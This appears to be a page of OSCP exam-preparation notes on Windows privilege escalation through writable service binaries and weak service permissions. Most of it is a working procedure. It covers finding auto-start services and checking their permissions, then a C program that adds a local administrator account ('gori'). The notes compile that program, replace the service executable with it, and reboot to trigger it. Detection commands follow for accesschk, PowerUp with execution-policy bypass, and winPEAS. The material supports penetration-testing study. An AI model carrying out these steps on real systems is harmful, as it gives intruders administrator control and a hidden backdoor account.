O
O
OSCP Notes
Search
K
Comment on page

Insecure File Permissions Priv Esc

whoami /priv to see if SeShutDownPrivilege is showing "Disabled" and then move to the next step
Find all services with "auto" start mode (automatically starts at system start-up),
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
If you see output, we should always check the permissions with icacls command.
icacls "file_path"
We are looking for (F)(W) permissions- full access
  • you might have to try other paths if there's any.
Once you see the file/executable has the incorrect permission, we can create a script that creates an administrator account.
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user gori goripass /add");
i = system ("net localgroup administrators gori /add");
return 0;
}
This script will add an account (user:gori pass:goripass) and will be added to the local administrator group.
Cross-compile the script in the local kali machine.
i686-w64-mingw32-gcc adduser.c -o adduser.exe
Transfer the file to the victim's machine.
Now, we need to rename the original executable file name to something else so that we can replace it with our evil executable.
move “C:\Program Files\..\..\normal.exe” “C:\Program Files\..\..\originalnormal.exe”
move “C:\Users\victim\Desktop\adduser.exe” “C:\Program Files\..\..\normal.exe”
Here, I named the original file to originalnormal.exe and moved the adduser with the "normal.exe"
(move command not only moves a file but also can rename a file)
Check the service is running
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Since we discovered that the service is running automatically, we can just reboot the machine and it should add the new account to the machine.
shutdown /r /t 0
Log back in to the new user
rdesktop -r -u gori -p goripass target_IP
Lastly, ensure that you are indeed the local admin.
net localgroup Administrators
Weak service permission
Detection
# Find all services authenticated users have modify access onto
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
if SERVICE_ALL_ACCESS then vulnerable
# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
or
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service permissions...
ServiceName : daclsvc
Path : "C:\Program Files\DACL Service\daclservice.exe"
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart : True
or
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
[+] Modifiable Services(T1007)
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
daclsvc: WriteData/CreateFiles